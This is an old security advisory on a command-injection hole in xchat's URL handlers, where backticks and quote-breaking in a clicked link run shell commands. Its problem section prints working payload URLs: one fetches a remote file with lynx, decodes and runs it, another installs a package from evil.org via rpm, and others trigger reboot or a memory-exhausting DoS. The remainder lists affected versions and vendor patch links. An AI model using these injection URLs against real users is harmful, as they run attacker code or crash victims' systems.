COMMAND

    xchat

SYSTEMS AFFECTED

    xchat

PROBLEM

    Zenith Parsec found  following.  Just  to show what  we mean about
    the possible  danger, start  Netscape and  enter in  xchat, (in  a
    channel or query window) the following URL.

        http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`'

    Right click on it, and select the Netscape (Existing) or  Netscape
    (New Window) option.   Wait until the  URL loads.   In a shell  on
    your machine type

        tail -2 ~/.bash_profile

        echo You've been hax0red
        echo --zen

    (oops... should've been You\'ve been hax0red, but u get the  idea)
    Lucky it wasn't  a script that  was well written,  and designed to
    use script kiddie stuff to hack root or something, eh?

    For the  non-lazy and  the lazy  who were  impressed by  the quick
    demo...

    The  hole  is  in  the  URL  Handler section.  Netscape (Existing)
    causes XChat to run the command

        netscape -remote 'openURL(%s)'

    where the %s is replaced by the selected URL eg:

        http://homepages.ihug.co.nz/~Sneuro/

    causes the command

        netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'

    which opens  that page.   Netscape (Run  New) causes  XChat to run
    the command netscape %s and so on.

    Backticking and shell expansion.  Imagine if someone types:

        l00k @ d15 k3w1 w@r3z  5173! http://www.altavista.com/?x=`date`y='`date`'

    with the (Existing)  or (New Window)  options and others  that use
    'openURL(%s)' type commands to start the program, you get:

        netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'

    count the 's and u will see that at the 2nd `date` they are closed
    and then reopened, so that `date` isn't escaped anymore... leaving
    it free to run, which it does.

    With the (Run New) type commands (that is  command %s  with no  's
    around the %s) you get:

        netscape http://www.altavista.com/?x=`date`y='`date`'

    which has the  1st `date` unescaped  (no 's around  it) and so  it
    executes.  In  real life though,  its unlikely anyone  would click
    on a URL like

        http://`reboot`/'`reboot`'

    though.   Still, not  all that  useful, ha?   Well, URLs  can  get
    pretty long.   For example,  a cgi-bin  call to  somethng can  get
    quite long.

        http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10

    compare that to:

        http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1

    quick glance... nothing wrong with it.

    Well, you seem to have a limitation, in that putting spaces in
    doesn't work, nor does redirection.

    Well, you can put spaces in.   The $IFS variable is probably  set.
    And who needs redirection, when you can do this:

        http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'

    (For (Existing) or (New Window))

        http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"

    By the way, a way to exploit this that that's not too blatent,  if
    you don't mind just DOS-ing the victim, is something like

        http://drugs.org/just/say/`yes`

    (warning, following said URL in xchat will eat all memory you  are
    allowed  to  eat  on  your   system,  and  thus  tends  to   crash
    poorly-configured linux systems).

SOLUTION

    It seems that this bug  will only affect XChat versions  1.3.9 and
    above, up  to and  including 1.4.2  (the devel  series may also be
    vulnerable, as there is no  mention on the changelog page  of this
    bug.) (release 1.3.9 was the first to have editable URL  handlers,
    which seem  to be  the cause).   Verfified bug  exists on  [x]chat
    1.5.5.

    Version 1.2.1 of xchat does not appear to be vulnerable.

    For Red Hat:

        sparc: ftp://updates.redhat.com/6.2/sparc/xchat-1.4.0-2.sparc.rpm
        alpha: ftp://updates.redhat.com/6.2/alpha/xchat-1.4.0-2.alpha.rpm
         i386: ftp://updates.redhat.com/6.2/i386/xchat-1.4.0-2.i386.rpm
      sources: ftp://updates.redhat.com/6.2/SRPMS/xchat-1.4.0-2.src.rpm

    For Linux-Mandrake:

        7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm
        7.1/SRPMS/xchat-1.4.1-4mdk.src.rpm

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/xchat-1.4.2-4cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/xchat-1.4.2-4cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/xchat-1.4.2-4cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/xchat-1.4.2-4cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/xchat-1.4.2-4cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/xchat-1.4.2-4cl.i386.rpm

    Just to chime in here,  for distributions who haven't released  an
    update the source for 1.4.2  is available on the author's  website
    here for the impatient:

        http://xchat.linuxpower.org/index.html

    The latest stable release of debian is not vulnerable. Others:

        http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3-0.1.diff.gz
        http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3-0.1.dsc
        http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3.orig.tar.gz
        http://security.debian.org/dists/stable/updates/main/binary-all/xchat-common_1.4.3-0.1_all.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat-gnome_1.4.3-0.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat-text_1.4.3-0.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat_1.4.3-0.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/xchat-gnome_1.4.3-0.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/xchat-text_1.4.3-0.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/xchat_1.4.3-0.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/xchat-gnome_1.4.3-0.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/xchat-text_1.4.3-0.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/xchat_1.4.3-0.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat-gnome_1.4.3-0.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat-text_1.4.3-0.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat_1.4.3-0.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat-gnome_1.4.3-0.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat-text_1.4.3-0.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat_1.4.3-0.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat-gnome_1.4.3-0.1_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat-text_1.4.3-0.1_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat_1.4.3-0.1_sparc.deb

    Slackware 7.1 does ship with xchat.  It is not vulnerable.

    An  essential  update  is  available  immediately from Helix Code,
    Inc.   via the  Helix GNOME  Updater and  from the following URLs.
    For Caldera OpenLinux eDesktop 2.4 systems:

        http://spidermonkey.helixcode.com/distributions/Caldera-2.4/xchat-1.4.3-0_helix_1.i386.rpm

    For Debian GNU/Linux potato (2.2) and woody systems:

        http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat_1.4.3-helix1_i386.deb
        http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-common_1.4.3-helix1_all.deb
        http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-text_1.4.3-helix1_i386.deb
        http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-gnome_1.4.3-helix1_i386.deb

    For LinuxPPC systems:

        http://spidermonkey.helixcode.com/distributions/LinuxPPC/xchat-1.4.3-0_helix_1.ppc.rpm

    For Linux Mandrake systems:

        http://spidermonkey.helixcode.com/distributions/Mandrake/xchat-1.4.3-0mdk_helix_1.i586.rpm

    For Red Hat Linux systems:

        http://spidermonkey.helixcode.com/distributions/RedHat-6/xchat-1.4.3-0_helix_1.i386.rpm

    For Solaris running on UltraSparc systems:

        http://spidermonkey.helixcode.com/distributions/Solaris/xchat-1.4.3-0_helix_1.sparc64.rpm

    For SuSE 6.3 systems:

        http://spidermonkey.helixcode.com/distributions/SuSE/xchat-1.4.3-0_helix_1.i386.rpm

    For SuSE 6.4 systems:

        http://spidermonkey.helixcode.com/distributions/SuSE-6.4/xchat-1.4.3-0_helix_1.i386.rpm

    For TurboLinux systems:

        http://spidermonkey.helixcode.com/distributions/TurboLinux-6/xchat-1.4.3-0_helix_1.i386.rpm

    For Linux-Mandrake:

        Linux-Mandrake 7.0: 7.0/RPMS/xchat-1.4.1-4mdk.i586.rpm
                            7.0/SRPMS/xchat-1.4.1-4mdk.src.rpm
        Linux-Mandrake 7.1: 7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm
                            7.1/SRPMS/xchat-1.4.1-4mdk.src.rpm

    For FreeBSD:

        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/xchat-1.4.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/irc/xchat-1.4.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/irc/xchat-1.4.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/irc/xchat-1.4.3.tgz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/irc/xchat-1.4.3.tgz

    Users of Slackware  7.0, 7.1, and  -current are urged  to upgraded
    to  the  xchat.tgz  package  available  in  the Slackware -current
    branch:

        ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/gtk/xchat.tgz

    Fo TurboLinux:

        ftp://ftp.turbolinux.com/pub/updates/6.0/xchat-1.4.3-1.i386.rpm
        ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/xchat-1.4.3-1.src.rpm

    Note:  You  must  rebuild  and  install  the  RPM if you choose to
    download and install the SRPM.   Simply installing the SRPM  alone
    WILL NOT CLOSE THE SECURITY HOLE.